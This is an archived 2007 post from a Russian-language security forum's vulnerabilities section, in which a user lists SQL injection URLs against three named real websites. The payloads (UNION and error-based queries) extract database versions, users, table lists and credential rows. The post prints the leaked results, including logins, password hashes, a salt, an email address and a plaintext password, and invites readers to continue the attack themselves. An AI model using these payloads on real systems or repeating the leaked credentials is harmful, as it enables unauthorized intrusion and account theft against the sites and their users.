ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 02.12.2007, 00:24
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

vedu.ru

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+system_user)-- writer

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+db_name())-- PortalDB


http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+top+1+cast(Username+as+nvarchar)%2B %27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27 %2Bcast(Salt+as+nvarchar)%2B%27%3A%27%2Bcast(Autho r_email+as+nvarchar)+from+frm_Author)--

логин/хеш/соль/мейл
superviser:561C4AF0B29C278947A313635ADDA7:93BE1FB7 A5A:evs@sec21.ru

дальше сами )

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+top+1+table_name+from+information_s chema.tables+where+table_name+not+in+('prt_FAQ','p rt_Vote','tst_razdels','dtproperties','frm_ActiveU ser','frm_Author','frm_BanList','frm_blob_file',
'frm_blob_image','frm_BuddyList','frm_Category','f rm_Configuration','frm_DateTimeFormat','frm_EmailN otify','frm_Forum','frm_Group','frm_GuestName','fr m_Permissions','frm_PMMessage','frm_Poll',%20'frm_ PollChoice','frm_Smut','frm_Thread','frm_Topic',
'frm_UserRoles','prt_announce','prt_announce_Group ','prt_Articles','prt_Articles_Comment','prt_Artic les_Group','prt_Articles_Ozenka','prt_Articles_Tre e','prt_Articles_Tree_Permissions','prt_Connector' ,'prt_FAQ_group','prt_Files','prt_Images','prt_Key s_Edulib',
'prt_myNavigator','prt_News','prt_News_Group','prt _part_name','prt_part_permissions','prt_Person'))-- и тд.

--------------------------------------------------------------------------
contester.tsure.ru

http://www.contester.tsure.ru/index.php?page=lectorium/main.php&catId=-1+union+select+concat_ws(0x2F,cast(version()+as+bi nary),cast(database()+as+binary),cast(user()+as+bi nary))/*

5.0.15-log/contest2/webapp@localhost


http://www.contester.tsure.ru/index.php?page=lectorium/main.php&catId=-1+union+select+concat_ws(0x2F,login,hash_password) +from+logins+limit+0,1/*

admin/*222512147AA24FDF67BC90EC2ED8B4E178D33600

--------------------------------------------------------------------------
stroy-press.ru

http://www.stroy-press.ru/?p=14&id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+a s+binary),cast(database()+as+binary),cast(user()+a s+binary)),4,5,6,7/*

4.1.18/ccr_ru_1/ccr@localhost



http://www.stroy-press.ru/?p=14&id=-1+union+select+1,2,concat_ws(0x2F,username,passwor d),4,5,6,7+from+users+limit+1,1/*

логин/пароль
123/6W7FCY8X
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ